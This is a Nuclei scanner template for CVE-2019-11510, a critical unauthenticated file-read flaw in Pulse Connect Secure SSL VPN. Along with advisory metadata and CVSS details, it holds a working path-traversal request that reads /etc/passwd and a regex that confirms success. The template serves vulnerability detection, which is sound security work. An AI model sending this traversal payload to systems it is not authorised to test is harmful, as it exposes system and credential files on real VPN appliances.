nuclei-templates/cves/2019/CVE-2019-11510.yaml

35 lines
1.2 KiB
YAML

id: CVE-2019-11510
info:
name: Pulse Connect Secure SSL VPN Arbitrary File Read
author: organiccrap
severity: critical
description: "Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 all contain an arbitrary file reading vulnerability that could allow unauthenticated remote attackers to send a specially crafted URI to gain improper access."
reference:
- https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
- https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/
- https://nvd.nist.gov/vuln/detail/CVE-2019-11510
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.00
cve-id: CVE-2019-11510
cwe-id: CWE-22
tags: cve,cve2019,pulsesecure,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
part: body
# Enhanced by mp on 2022/03/29